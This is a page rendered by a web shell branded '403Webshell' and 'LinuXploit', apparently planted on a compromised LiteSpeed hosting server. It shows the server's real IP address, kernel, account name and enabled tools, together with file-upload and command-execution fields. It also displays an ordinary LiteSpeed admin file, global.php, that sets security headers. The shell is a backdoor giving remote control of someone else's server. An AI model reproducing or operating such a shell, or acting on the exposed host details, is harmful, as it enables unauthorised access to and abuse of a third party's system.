403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.144.89.152
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/thread-self/root/usr/local/lsws/admin/html/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/thread-self/root/usr/local/lsws/admin/html/includes/global.php
<?php

ob_start(); // just in case


header("Expires: -1"); //ie busting

header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
header("X-Frame-Options: SAMEORIGIN");
header("Content-Security-Policy: frame-ancestors 'self'");
header("Referrer-Policy: same-origin");
header("X-Content-Type-Options: nosniff");

//set auto include path...get rid of all path headaches
ini_set('include_path',
$_SERVER['LS_SERVER_ROOT'] . 'admin/html/classes/:' .
$_SERVER['LS_SERVER_ROOT'] . 'admin/html/classes/ws/:' .
$_SERVER['LS_SERVER_ROOT'] . 'admin/html/includes/:.');

// **PREVENTING SESSION HIJACKING**
// Prevents javascript XSS attacks aimed to steal the session ID
ini_set('session.cookie_httponly', 1);

// **PREVENTING SESSION FIXATION**
// Session ID cannot be passed through URLs
ini_set('session.use_only_cookies', 1);

// Uses a secure connection (HTTPS) if possible
if (isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on')) {
	ini_set('session.cookie_secure', 1);
}

date_default_timezone_set('America/New_York');

spl_autoload_register( function ($class) {
	include $class . '.php';
});

Youez - 2016 - github.com/yon3zu
LinuXploit